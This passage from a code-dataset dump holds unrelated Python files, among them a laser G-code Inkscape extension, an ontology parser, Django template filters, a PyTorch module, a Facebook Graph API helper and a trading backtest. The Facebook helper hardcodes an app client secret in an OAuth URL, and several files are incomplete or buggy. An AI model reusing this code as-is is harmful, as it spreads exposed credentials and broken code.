layer in self.orientation_points:\n            self.error(_(\"Active layer already has orientation points! Remove them or select another layer!\"),\n                       \"active_layer_already_has_orientation_points\")\n\n        orientation_group = etree.SubElement(layer, inkex.addNS('g', 'svg'),\n                                             {\"gcodetools\": \"Gcodetools orientation group\"})\n\n        # translate == ['0', '-917.7043']\n        if layer.get(\"transform\") != None:\n            translate = layer.get(\"transform\").replace(\"translate(\", \"\").replace(\")\", \"\").split(\",\")\n        else:\n            translate = [0, 0]\n\n        # doc height in pixels (38 mm == 143.62204724px)\n        doc_height = self.svg.unittouu(self.document.getroot().xpath('@height', namespaces=inkex.NSS)[0])\n\n        if self.document.getroot().get('height') == \"100%\":\n            doc_height = 1052.3622047\n            print_(\"Overriding height from 100 percent to %s\" % doc_height)\n\n        print_(\"Document height: \" + str(doc_height));\n\n        if self.options.unit == \"G21 (All units in mm)\":\n            points = [[0., 0., 0.], [100., 0., 0.], [0., 100., 0.]]\n            orientation_scale = 1\n            print_(\"orientation_scale < 0 ===> switching to mm units=%0.10f\" % orientation_scale)\n        elif self.options.unit == \"G20 (All units in inches)\":\n            points = [[0., 0., 0.], [5., 0., 0.], [0., 5., 0.]]\n            orientation_scale = 90\n            print_(\"orientation_scale < 0 ===> switching to inches units=%0.10f\" % orientation_scale)\n\n        points = points[:2]\n\n        print_((\"using orientation scale\", orientation_scale, \"i=\", points))\n        for i in points:\n            # X == Correct!\n            # si == x,y coordinate in px\n            # si has correct coordinates\n            # if the layer has any transform it will be in translate, so let's add that\n            si = [i[0] * orientation_scale, (i[1] * orientation_scale) + float(translate[1])]\n            g = etree.SubElement(orientation_group, inkex.addNS('g', 'svg'),\n                                 {'gcodetools': \"Gcodetools orientation point (2 points)\"})\n            etree.SubElement(g, inkex.addNS('path', 'svg'),\n                             {\n                                 
'style': \"stroke:none;fill:#000000;\",\n 'd': 'm %s,%s 2.9375,-6.343750000001 0.8125,1.90625 6.843748640396,-6.84374864039 0,0 0.6875,0.6875 -6.84375,6.84375 1.90625,0.812500000001 z z' % (\n si[0], -si[1] + doc_height),\n 'gcodetools': \"Gcodetools orientation point arrow\"\n })\n t = etree.SubElement(g, inkex.addNS('text', 'svg'),\n {\n 'style': \"font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;fill:#000000;fill-opacity:1;stroke:none;\",\n inkex.addNS(\"space\", \"xml\"): \"preserve\",\n 'x': str(si[0] + 10),\n 'y': str(-si[1] - 10 + doc_height),\n 'gcodetools': \"Gcodetools orientation point text\"\n })\n t.text = \"(%s; %s; %s)\" % (i[0], i[1], i[2])\n\n\n ################################################################################\n #\n # Effect\n #\n # Main function of Gcodetools class\n #\n ################################################################################\n def effect(self):\n global options\n options = self.options\n options.self = self\n options.doc_root = self.document.getroot()\n # define print_ function\n global print_\n if self.options.log_create_log:\n try:\n if os.path.isfile(self.options.log_filename): os.remove(self.options.log_filename)\n f = open(self.options.log_filename, \"a\")\n f.write(\"Gcodetools log file.\\nStarted at %s.\\n%s\\n\" % (\n time.strftime(\"%d.%m.%Y %H:%M:%S\"), options.log_filename))\n f.write(\"%s tab is active.\\n\" % self.options.active_tab)\n f.close()\n except:\n print_ = lambda *x: None\n else:\n print_ = lambda *x: None\n self.get_info()\n if self.orientation_points == {}:\n self.error(_(\n \"Orientation points have not been defined! A default set of orientation points has been automatically added.\"),\n \"warning\")\n self.orientation(self.layers[min(0, len(self.layers) - 1)])\n self.get_info()\n\n self.tools = {\n \"name\": \"Laser Engraver\",\n \"id\": \"Laser Engraver\",\n \"penetration feed\": self.options.laser_speed,\n \"feed\": self.options.laser_speed,\n \"gcode before path\": (\"G4 P0 \\n\" + self.options.laser_command + \" S\" + str(\n int(self.options.laser_power)) + \"\\nG4 P\" + self.options.power_delay),\n \"gcode after path\": (\n \"G4 P0 \\n\" + self.options.laser_off_command + \" S0\" + \"\\n\" + \"G1 F\" + self.options.travel_speed),\n }\n\n self.get_info()\n self.laser()\n\n\ne = LaserGcode()\nif target_version < 1.0:\n e.affect()\nelse:\n e.run()\n","sub_path":"Drawbotextension/JTechPhotonic LaserTools/testlaser.py","file_name":"testlaser.py","file_ext":"py","file_size_in_byte":63526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"475286047","text":"import logging\nimport re\nimport json\nimport jsonlines\nfrom definitions import PIS_OUTPUT_EFO, PIS_OUTPUT_ANNOTATIONS\n\nlogger = logging.getLogger(__name__)\n\n\nclass MONDO(object):\n\n def __init__(self, mondo_input):\n self.mondo_input = mondo_input\n self.mondo = {}\n\n def init_mondo(self, id):\n self.mondo[id] = {}\n self.mondo[id]['id'] = id\n self.mondo[id]['resource'] = 'MONDO'\n\n def extract_id(self, elem):\n return elem.replace(\":\", \"_\")\n\n def get_id(self, mondo):\n if 'id' in mondo:\n return mondo['id'].replace(\":\", \"_\")\n if '@id' in mondo:\n return re.sub(r'^.*?:', '', mondo['@id'] )\n else:\n print (\"orrore\")\n\n def set_dbXRefs(self, id, mondo):\n dbXRefs = []\n if 'hasDbXref' in mondo:\n if isinstance(mondo['hasDbXref'], str):\n dbXRefs.append(mondo['hasDbXref'])\n else:\n for ref in mondo['hasDbXref']:\n 
dbXRefs.append(ref)\n\n self.mondo[id]['dbXRefs']= dbXRefs\n\n def set_obsoleted_term(self, id, mondo):\n if \"hasAlternativeId\" in mondo:\n obsolete = []\n if isinstance(mondo['hasAlternativeId'], str):\n obsolete.append(self.extract_id(mondo['hasAlternativeId']))\n else:\n for term in mondo['hasAlternativeId']:\n obsolete.append(self.extract_id(term))\n\n self.mondo[id]['obsolete_terms'] = obsolete\n\n\n def set_label(self, id, mondo):\n if 'label' in mondo:\n if isinstance(mondo['label'], str):\n self.mondo[id]['name'] = mondo['label']\n elif isinstance(mondo['label'], dict):\n self.mondo[id]['name'] = mondo['label']['@value']\n else:\n if isinstance(mondo['label'][0], str):\n self.mondo[id]['name'] = mondo['label'][0]\n else:\n self.mondo[id]['name'] = mondo['label'][0]['@value']\n\n def is_valid(self,mondo):\n if 'owl:deprecated' in mondo:\n return False\n else:\n return True\n\n def get_subClassOf(self,id, mondo):\n if \"subClassOf\" in mondo:\n classesOf = []\n if isinstance(mondo['subClassOf'], str):\n classesOf.append(re.sub(r'^.*?:', '', mondo['subClassOf'] ).replace(\":\", \"_\"))\n else:\n for term in mondo['subClassOf']:\n classesOf.append(re.sub(r'^.*?:', '', term).replace(\":\", \"_\"))\n\n self.mondo[id]['subClassOf'] = classesOf\n\n def set_mapping(self, id, mondo):\n if 'someValuesFrom' in mondo:\n self.mondo[id]['mapping'] = re.sub(r'^.*?:', '', mondo['someValuesFrom'] ).replace(\":\", \"_\")\n\n def set_phenotype(self):\n for mondo_id in self.mondo:\n phenotypes = []\n if 'subClassOf' in self.mondo[mondo_id]:\n for elem in self.mondo[mondo_id]['subClassOf']:\n if elem in self.mondo:\n if 'mapping' in self.mondo[elem]:\n phenotypes.append(self.mondo[elem]['mapping'])\n else:\n phenotypes.append(elem)\n self.mondo[mondo_id]['phenotypes'] = phenotypes\n\n\n def generate(self):\n with open(self.mondo_input) as input:\n for line in input:\n mondo = json.loads(line)\n id = self.get_id(mondo)\n if self.is_valid(mondo):\n self.init_mondo(id)\n self.set_label(id, mondo)\n self.set_dbXRefs(id, mondo)\n self.set_obsoleted_term(id, mondo)\n self.get_subClassOf(id, mondo)\n self.set_mapping(id,mondo)\n\n self.set_phenotype()\n\n\n def save_mondo(self, output_filename):\n mondo_filename = PIS_OUTPUT_ANNOTATIONS+'/'+output_filename\n with jsonlines.open(mondo_filename, mode='w') as writer:\n for elem in self.mondo:\n writer.write(self.mondo[elem])\n return mondo_filename","sub_path":"modules/helpers/MONDO.py","file_name":"MONDO.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"582003359","text":"import os\n\nfrom django import template\nfrom django.conf import settings\nfrom django.db.models.fields.files import FieldFile\nfrom django.utils.formats import number_format\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import gettext as _\n\nregister = template.Library()\n\n\n@register.filter()\ndef get_field_name(object, field):\n \"\"\" Get the verbose name of the asked field of the object. 
\"\"\"\n verbose_name = object._meta.get_field(field).verbose_name\n return verbose_name\n\n\n@register.filter()\n# From https://stackoverflow.com/a/7571539/8296763\ndef human_readable(value, arg):\n \"\"\" Output the human readable value of a field.\n\n Especially useful for choice-fields that would otherwise\n show the key instead of the value.\n \"\"\"\n if hasattr(value, 'get_' + str(arg) + '_display'):\n returnvalue = getattr(value, 'get_%s_display' % arg)()\n elif hasattr(value, str(arg)):\n if callable(getattr(value, str(arg))):\n returnvalue = getattr(value, arg)()\n else:\n returnvalue = getattr(value, arg)\n else:\n try:\n returnvalue = value[arg]\n except KeyError:\n return _('Invalid key %(key)s for value %(value)s') % {'key': arg, 'value': value}\n # Make sure boolean values get a human readable output as well and files get a link to open them\n if isinstance(returnvalue, bool):\n return _('Yes') if returnvalue is True else _('No')\n if type(returnvalue) is FieldFile and returnvalue:\n return mark_safe('' + os.path.basename(returnvalue.name) + '')\n if returnvalue is None:\n return '-'\n else:\n return returnvalue\n\n\n@register.filter()\ndef moneyformat(value):\n \"\"\" Properly format a numeric value as a monetary value. \"\"\"\n if value is None or value == '':\n return settings.MONETARY_CURRENCY + '-'\n sign = '-' if value < 0 else ''\n return sign + settings.MONETARY_CURRENCY + number_format(abs(value), decimal_pos=settings.MONETARY_DECIMAL_PLACES)\n","sub_path":"apps/core/templatetags/coretags.py","file_name":"coretags.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"627595200","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.externals import joblib\nfrom pkg_resources import resource_filename\nLINEAR_MODEL = joblib.load(resource_filename(\n 'mmsplice', 'models/linear_model.pkl'))\nLOGISTIC_MODEL = joblib.load(resource_filename(\n 'mmsplice', 'models/Pathogenicity.pkl'))\n\n\ndef max_varEff(df):\n \"\"\" Summarize largest absolute effect per variant across all affected exons.\n Args:\n df: result of `predict_all_table`\n \"\"\"\n if isinstance(df, str):\n df = pd.read_csv(df, index_col=0)\n\n ref_list = ['mmsplice_ref_acceptorIntron',\n 'mmsplice_ref_acceptor',\n 'mmsplice_ref_exon',\n 'mmsplice_ref_donor',\n 'mmsplice_ref_donorIntron']\n alt_list = ['mmsplice_alt_acceptorIntron',\n 'mmsplice_alt_acceptor',\n 'mmsplice_alt_exon',\n 'mmsplice_alt_donor',\n 'mmsplice_alt_donorIntron']\n\n if 'mmsplice_dlogitPsi' not in df.columns:\n X = df[alt_list].values - df[ref_list].values\n X = transform(X)\n df['mmsplice_dlogitPsi'] = LINEAR_MODEL.predict(X)\n\n dfMax = df.groupby(['ID'], as_index=False).agg(\n {'mmsplice_dlogitPsi': lambda x: max(x, key=abs)})\n\n dfMax = dfMax.merge(df, how='left', on=['ID', 'mmsplice_dlogitPsi'])\n dfMax = dfMax.drop_duplicates(subset=['ID', 'mmsplice_dlogitPsi'])\n # dfMax = dfMax.drop(\"mmsplice_dlogitPsi\", axis=1)\n return dfMax\n\n\ndef _not_close0(arr):\n return ~np.isclose(arr, 0)\n\n\ndef _and_not_close0(x, y):\n return np.logical_and(_not_close0(x), _not_close0(y))\n\n\ndef transform(X, region_only=False):\n ''' Make interaction terms for the overlapping prediction region\n Args:\n X: modular prediction. 
Shape (, 5)\n region_only: only interaction terms with indicator function on overlapping\n '''\n exon_overlap = np.logical_or(\n _and_not_close0(X[:, 1], X[:, 2]),\n _and_not_close0(X[:, 2], X[:, 3])\n )\n acceptor_intron_overlap = _and_not_close0(X[:, 0], X[:, 1])\n donor_intron_overlap = _and_not_close0(X[:, 3], X[:, 4])\n\n if not region_only:\n exon_overlap = X[:, 2] * exon_overlap\n donor_intron_overlap = X[:, 4] * donor_intron_overlap\n acceptor_intron_overlap = X[:, 0] * acceptor_intron_overlap\n\n return np.hstack([\n X,\n exon_overlap.reshape(-1, 1),\n donor_intron_overlap.reshape(-1, 1),\n acceptor_intron_overlap.reshape(-1, 1)\n ])\n\n\ndef predict_deltaLogitPsi(X_ref, X_alt):\n return LINEAR_MODEL.predict(transform(X_alt - X_ref, region_only=False))\n\n\ndef predict_pathogenicity(X_ref, X_alt):\n X = transform(X_alt - X_ref, region_only=True)\n X = np.concatenate([X_ref, X_alt, X[:, -3:]], axis=-1)\n return LOGISTIC_MODEL.predict_proba(X)[:, 1]\n\n\ndef read_vep(vep_result_path,\n max_per_var=False):\n ''' Read MMSplice VEP plugin output. Only support vcf type output.\n\n Args:\n vep_result_path: file path to the returned result of VEP plugin.\n max_per_var: return maximum absolute effect size per variant.\n '''\n\n from cyvcf2 import VCF\n from collections import defaultdict\n\n score_pred = []\n\n keys = [\n 'mmsplice_alt_acceptor',\n 'mmsplice_alt_acceptorIntron',\n 'mmsplice_alt_donor',\n 'mmsplice_alt_donorIntron',\n 'mmsplice_alt_exon',\n 'mmsplice_delta_logit_psi',\n 'mmsplice_pathogenicity',\n 'mmsplice_ref_acceptor',\n 'mmsplice_ref_acceptorIntron',\n 'mmsplice_ref_donor',\n 'mmsplice_ref_donorIntron',\n 'mmsplice_ref_exon'\n ]\n\n alt_seqs = defaultdict(list)\n ref_seqs = defaultdict(list)\n\n for l in VCF(vep_result_path):\n csq = l.INFO['CSQ'].split(',')\n predictions = map(lambda x: tuple(x.split('|')[-len(keys):]), csq)\n\n for pred in predictions:\n if pred != ('',) * len(keys):\n x = dict(\n zip(keys, map(float, (i if i != '' else 0 for i in pred))))\n x['ID'] = \"%s:%d:%s:%s\" % (\n l.CHROM, int(l.start) + 1, l.REF, l.ALT)\n score_pred.append(x)\n\n df_plugin = pd.DataFrame(score_pred)\n\n if max_per_var:\n df_plugin = max_varEff(df_plugin).set_index('ID')\n\n return df_plugin\n","sub_path":"mmsplice/utils/postproc.py","file_name":"postproc.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"31288296","text":"import torch\nimport torch.nn as nn\n\nfrom .. 
import builder\nfrom ..registry import TEMPORAL\nfrom mmcv.cnn import xavier_init\n\n\n@TEMPORAL.register_module\nclass GatingSeq(nn.Module):\n\n    def __init__(self,\n                 in_channels=(512, 1024, 512, 256, 256, 256),\n                 gating_seq_len=4):\n        super(GatingSeq, self).__init__()\n        self.in_channels = in_channels\n        self.gating_seq_len = gating_seq_len\n        conv_gating = []\n        sigmoid = []\n        conv = []\n        relu = []\n\n        for i in range(len(self.in_channels)):\n            # note: the original used self.seq_len here, which is never defined; unified on self.gating_seq_len\n            conv_gating.append(nn.Conv2d(self.in_channels[i]*self.gating_seq_len, self.gating_seq_len, \\\n                kernel_size=3, padding=1))\n            sigmoid.append(nn.Sigmoid())\n            conv.append(nn.Conv2d(self.in_channels[i]*self.gating_seq_len, self.in_channels[i],\\\n                kernel_size=3, padding=1))\n            relu.append(nn.ReLU(inplace=True))\n        \n        self.conv_gating = nn.ModuleList(conv_gating)\n        self.sigmoid = nn.ModuleList(sigmoid)\n        self.conv = nn.ModuleList(conv)\n        self.relu = nn.ModuleList(relu)\n\n    def init_weights(self):\n        for m in self.modules():\n            if isinstance(m, nn.Conv2d):\n                xavier_init(m, distribution='uniform', bias=0)\n\n    def forward(self, x):\n\n        x_all = []\n        x_temp = []\n\n        for num_in in range(len(self.in_channels)):\n            x_all.append([x[seq][num_in] for seq in range(self.gating_seq_len)])\n\n        for feat, conv_gating, sigmoid, conv, relu in zip(x_all, self.conv_gating, self.sigmoid, self.conv, self.relu):\n            \n            feat_cat = torch.cat(feat, 1)\n            gating_weight = sigmoid(conv_gating(feat_cat))\n            feat_gating = [feat[i] * gating_weight[:,i,:,:].unsqueeze(1) \\\n                           for i in range(len(feat))]\n\n            feat_temp = torch.cat(feat_gating, 1)\n            feat_temp = relu(conv(feat_temp))\n            x_temp.append(feat_temp)\n\n        return x_temp\n","sub_path":"mmdet/models/pixel/gating_seq.py","file_name":"gating_seq.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"542052285","text":"import urllib2\n\nfrom main.models import *\nimport main.facebook as fb\n\ndef get_name(at):\n    if not at: return \"\"\n    g = fb.GraphAPI(access_token = at )\n    me = g.get_object('me')\n    return me['first_name'] + ' ' + me['last_name']\n\ndef put_wall(at, msg):\n    if not at: return None\n    g = fb.GraphAPI(access_token = at)\n    g.put_object(\"me\", \"feed\",\n                 message=msg,\n                 name= 'VerifyY',\n                 picture= 'http://myfriendfactory.appspot.com/static/images/wall.png',\n                 link= 'http://www.verifyy.com',\n                 actions= [\n                     {\n                         \"name\": \"View Experiment\",\n                         \"link\": \"http://www.verifyy.com/\"\n                     }])\n\n\n\ndef get_token_from_code(code):\n    r = urllib2.urlopen(\"https://graph.facebook.com/oauth/access_token?client_id=205425319498174&redirect_uri=http://localhost:8000/&client_secret=1a5aa67a3a7f8bbe40422a8d01445e82&code=%s\" % code).read()\n    return r.split('=')[1]\n\ndef get_auth_token(request):\n    res = FBAuthCode.objects.filter(user=request.user)\n    if not res: return None\n    code = res[0].code\n    return get_token_from_code(code)\n\ndef get_cached_token(request):\n    authed = not isinstance(request.user,AnonymousUser)\n    if not authed: return None\n    res = list(FBAuthToken.objects.filter(user=request.user))\n    if not res: return None\n    return res[-1].token\n\ndef get_profile(token):\n    g = fb.GraphAPI(access_token = token)\n    return g.get_object(\"me\")\n\ndef save_code(user, code):\n    at = get_token_from_code(code)\n    fba = FBAuthCode(code=code, user=user)\n    fba.save()\n    \n","sub_path":"main/fb.py","file_name":"fb.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"314128815","text":"import 
datetime\nimport pandas as pd\nimport numpy as np\nimport quandl\nfrom abc import ABCMeta, abstractmethod\n\n\nclass MovingAverageXStrategy():\n\tdef __init__(self,symbol,bars,short_window,long_window):\n\t\tself.symbol=symbol\n\t\tself.bars = bars\n\t\tself.short_window=short_window\n\t\tself.long_window=long_window\n\n\tdef generate_signals(self):\n\t\tsignals=pd.DataFrame(index=self.bars.index)\n\t\tsignals['signal']=0\n\n\t\tsignals['short_mavg']=pd.rolling_mean(self.bars['Close'],self.short_window, min_periods=1)\n\t\tsignals['long_mavg']=pd.rolling_mean(self.bars['Close'],self.long_window,min_periods=1)\n\n\t\tsignals['signal'][self.short_window:] = np.where(signals['short_mavg'][self.short_window:] > signals['long_mavg'][self.short_window:],1,0)\n\t\tsignals['positions'] = signals['signal'].diff()\n\t\tself.signals=signals\n\n\t\treturn signals\t\n\nclass PostEarningsDriftStrategy():\n\tdef __init__(self,symbol,bars,window):\n\t\tself.symbol=symbol\n\t\tself.bars = bars\n\t\tself.window=window\n\tdef generate_signals(self):\n\n\t\treturn signals\n\nclass MarketOnClosePortfolio(object):\n\tdef __init__(self,symbol,bars,signals,initial_capital):\n\t\t\tself.symbol=symbol\n\t\t\tself.bars=bars\n\t\t\tself.signals=signals\n\t\t\tself.initial_capital=initial_capital\n\n\tdef generate_positions(self):\n\t\tpositions = pd.DataFrame(index=self.signals.index).fillna(0.0)\n\t\tpositions[self.symbol]=100*self.signals['signal']\n\t\tself.positions=positions\n\t\treturn positions\n\n\tdef backtest_portfolio(self):\n\t\t\n\n\t\tportfolio = self.positions[self.symbol] * self.bars['Close']\n\t\tpos_diff= self.positions[self.symbol].diff()\n\n\t\tportfolio['holdings']=(self.positions*self.bars['Close'])\n\t\tportfolio['cash']=self.initial_capital - (pos_diff*self.bars['Close']).cumsum()\n\n\t\tportfolio['total']=portfolio['cash']+portfolio['holdings']\n\t\tportfolio['returns']=portfolio['total'].pct_change()\n\t\treturn portfolio\n\n\nif __name__=='__main__':\n\tsymbol = 'ORCL'\n\tbars= pd.read_csv('orcl-2000.csv')\n\n\tmac=MovingAverageXStrategy(symbol,bars,short_window=40,long_window=100)\n\tsignals=mac.generate_signals()\n\n\tportfolio=MarketOnClosePortfolio(symbol,bars,signals,initial_capital=100000.0)\n\treturns = portfolio.backtest_portfolio()\n\n","sub_path":"ma.py","file_name":"ma.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"249359971","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# import ipdb\nimport time\n\n\n# Clustering penalties\nclass ClusterLoss(torch.nn.Module):\n    \"\"\"\n    Cluster loss comes from the SuBiC paper and consists of two losses.\n    First is the Mean Entropy Loss which makes the output close to one-hot encoded\n    vectors.\n    Second is the Batch Entropy Loss which ensures a uniform distribution of activations over the\n    output (Uniform block support). 
\n \"\"\"\n def __init__(self):\n super(ClusterLoss, self).__init__()\n def entropy(self, logits):\n return -1.0*(F.softmax(logits,dim=0)*F.log_softmax(logits,dim=0)).sum()\n def forward(self, logits):\n \"\"\"\n Input: block_feats -> T x K # Where K is the number of classes and T is the batch size\n Output: L = MEL, BEL\n \"\"\"\n #Mean Entropy Loss - For one-hotness\n # L1 = Sum_batch_i(Sum_block_m(Entropy(block_i_m)))/TM\n sum1 = torch.zeros([logits.shape[0],1])\n for t in range(logits.shape[0]):\n sum1[t] = self.entropy(logits[t,:])\n L1 = torch.mean(sum1)\n\n #Batch Entropy Loss - For uniform support\n # L2 = -Sum_block_m(Entropy(Sum_batch_i(block_i_m)/T))/M\n mean_output = torch.mean(logits,dim=0)\n L2 = -1.0*self.entropy(mean_output)\n\n return L1.cuda(), L2.cuda()\n\n\n# Stochastic Transformation Stability Loss. Introduced in: \n# \"Regularization With Stochastic Transformations and Perturbations for Deep Semi-Supervised\n# Learning\"\nclass StochasticTransformationLoss(torch.nn.Module):\n \"\"\"\n The idea behind this is that stochastic transformations of an image (flips and translations)\n should lead to very close features.\n \"\"\"\n def __init__(self):\n super(StochasticTransformationLoss, self).__init__()\n def forward(self, features, num_transformations):\n \"\"\"\n Input: features -> T x D # Where D is the feature dimension and T is the batch size\n num_transformations -> Number of transformations applied to the data\n Make sure that T is a multiple of num_transformations\n Output: ST Loss \n \"\"\"\n batch_size = features.shape[0]\n split_features = torch.zeros([num_transformations, batch_size/num_transformations,\n features.shape[1]])\n for i in range(num_transformations):\n indices = torch.Tensor(range(i, batch_size, num_transformations)) # Has to be a longtensor\n split_features[i,:,:] = torch.index_select(feature, 0, indices)\n\n \n\n\n\ndef get_loss(loss_name ='CE'):\n if loss_name == 'CE':\n # ignore_index ignores the samples which have label -1000. We specify the unsupervised images by label -1000\n criterion = nn.CrossEntropyLoss(ignore_index=-1000).cuda()\n elif loss_name == 'ClusterLoss':\n criterion = ClusterLoss().cuda()\n elif loss_name == 'LocalityLoss':\n criterion = LocalityLoss().cuda()\n elif loss_name == 'CAMLocalityLoss':\n criterion = CAMLocalityLoss().cuda()\n elif loss_name == 'LEL':\n criterion = LocalityEntropyLoss().cuda()\n\n return criterion\n","sub_path":"CIFAR10/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"629663199","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2019 Kyoto University (Hirofumi Inaguma)\n# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)\n\n\"\"\"Utility functions for evaluation.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport torch\n\nlogger = logging.getLogger(__name__)\n\n\ndef average_checkpoints(model, best_model_path, epoch, n_average):\n if n_average == 1:\n return model\n\n n_models = 1\n state_dict_ave = model.state_dict()\n for i in range(epoch - 1, 0, -1):\n if n_models == n_average:\n break\n checkpoint_path = best_model_path.replace('-' + str(epoch), '-' + str(i))\n if os.path.isfile(checkpoint_path):\n logger.info(\"=> Loading checkpoint (epoch:%d): %s\" % (i, checkpoint_path))\n params = torch.load(checkpoint_path,\n map_location=lambda storage, loc: storage)['state_dict']\n for k, v in params.items():\n state_dict_ave[k] += v\n n_models += 1\n\n # take an average\n logger.info('Take average for %d models' % n_models)\n for k, v in state_dict_ave.items():\n state_dict_ave[k] /= n_models\n model.load_state_dict(state_dict_ave)\n\n avrage_checkpoint_path = best_model_path.replace('-' + str(epoch), '-avg' + str(n_average))\n torch.save(model, avrage_checkpoint_path)\n\n return model\n","sub_path":"neural_sp/bin/eval_utils.py","file_name":"eval_utils.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"617991685","text":"# -*- coding: UTF-8 -*-\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom matplotlib.pyplot import MultipleLocator\nimport numpy\nimport contract\nimport datetime\n\ndef main():\n month1 = input(\"please input month1 01 ~ 12: \");\n month2 = input(\"please input month2 01 ~ 12: \");\n\n cs = [\n [\"ma14\",\"gray\"],\n [\"ma15\",\"pink\"],\n [\"ma16\",\"green\"],\n [\"ma17\",\"brown\"],\n [\"ma18\",\"blue\"],\n [\"ma19\",\"red\"],\n [\"ma20\",\"black\"]\n ]\n\n l = []\n name_list = []\n for i, val in enumerate(cs):\n a = val[0] + month1\n b = val[0] + month2\n if month2 < month1:\n if i >= len(cs)-1:\n continue\n b = cs[i+1][0]+month2\n l.append([a,b,a+\" - \"+b])\n name_list.append(a)\n name_list.append(b)\n \n datas = contract.load()\n m = contract.filter1(datas,name_list,False)\n\n ax = plt.gca()\n #指定X轴的以日期格式(带小时)显示\n ax.xaxis.set_major_formatter(mdates.DateFormatter('%m-%d'))\n #X轴的间隔为小时\n ax.xaxis.set_major_locator(mdates.MonthLocator())\n \n y_major_locator=MultipleLocator(100)\n ax.yaxis.set_major_locator(y_major_locator)\n\n diff_l = []\n for pair in l:\n diff_x = []\n diff_y = []\n if pair[0] not in m or pair[1] not in m:\n continue\n ma = m[pair[0]]\n mb = m[pair[1]]\n year = int(\"20\"+pair[0][2:4])\n for (date,v) in ma.items():\n if date not in mb:\n continue\n diff_y.append(v - mb[date])\n print(2019 + date.year - year,date.month,date.day)\n diff_x.append(datetime.date(2019 + date.year - year,date.month,date.day))\n \n\n diff_l.append([pair[2],diff_x,diff_y])\n \n plt.xlabel(\"ma price diff \" + month1 + \" \" + month2)\n plt.ylabel(\"\")\n ls = []\n labels = []\n for i,v in enumerate(diff_l):\n plt.plot(v[1],v[2],color=cs[i][1],linestyle='-',linewidth = 1,label=v[0])\n labels.append(v[0])\n \n plt.legend(labels = labels,loc = 'best',shadow = True)\n plt.grid(axis=\"y\",linestyle=\"--\")\n 
plt.show()\n\nmain()","sub_path":"sp/price_diff.py","file_name":"price_diff.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"277021488","text":"import pandas as pd\nfrom pandas import DataFrame\nimport random\nfrom xlwt import Workbook\n\n\n# 创建目标表\ndef build_xlsx(num):\n # 创建文件以存储480个样本\n book = Workbook(encoding='utf-8')\n sheet1 = book.add_sheet('Sheet 1')\n sheet1.write(0, 0, \"id\")\n sheet1.write(0, 1, \"image_id\")\n for i in range(30):\n sheet1.write(i + 1, 0, i)\n # 保存Excel book.save('path/文件名称.xls')\n book.save('task_img_id'+str(num)+'.xls')\n\n\n# 挑选30张图像进行调度,用随机函数从300张图像中挑选30张\ndef get_random_samples(num, g):\n result = pd.read_excel('task_img_id'+str(g)+'.xls')\n ran = []\n # 在300份图像数据中随机选取30份图像\n p = 0\n while p < 30:\n temp = int(random.random() * 300)\n if temp in ran:\n continue\n else:\n ran.append(temp)\n result['image_id'][p] = temp\n DataFrame(result).to_excel('task_img_id'+str(g)+'.xls')\n print(p, temp)\n p += 1\n\n\nif __name__ == '__main__':\n num = 30\n for i in range(10):\n build_xlsx(i)\n get_random_samples(num, i)\n","sub_path":"src/DNN&RF/get_taskId_byRandom.py","file_name":"get_taskId_byRandom.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"550194788","text":"from matplotlib import pyplot as plt\n# %matplotlib inline\n\nApl_price = [4,5,1]\nYear = [1,2,3]\n\nplt.plot(Year,Apl_price)\n\nplt.title('Stats')\nplt.xlabel('Year')\nplt.ylabel('Apl_price')\nplt.show()","sub_path":"Graph_mataplot.py","file_name":"Graph_mataplot.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"228439863","text":"import numpy as np\n\ndata=[1,2,3,4]\nnum_validation_samples=10000\n\n# 通常需要打乱数据\nnp.random.shuffle(data)\n\n# 定义验证集\nvalidation_data=data[:num_validation_samples]\ndata=data[num_validation_samples:]\n\n# 定义训练集\ntraining_data=data[:]\n\n# 在训练集上训练模型,并在验证数据上评估模型\nmodel=get_model()\nmodel.train(training_data)\nvalidation_score=model.evaluate(validation_data)\n\n# 现在你可以调节模型、重新训练、评估,然后再次调节\n\n\n# 一旦调节好超参数,通常就在所有非测试数据上从头开始训练最终模型\nmodel=get_model()\nmodel.train(np.concatenate([training_data,validation_data]))\ntest_socre=model.evaluate(test_data)","sub_path":"DeepLearingwithPython/Listing4-1.py","file_name":"Listing4-1.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 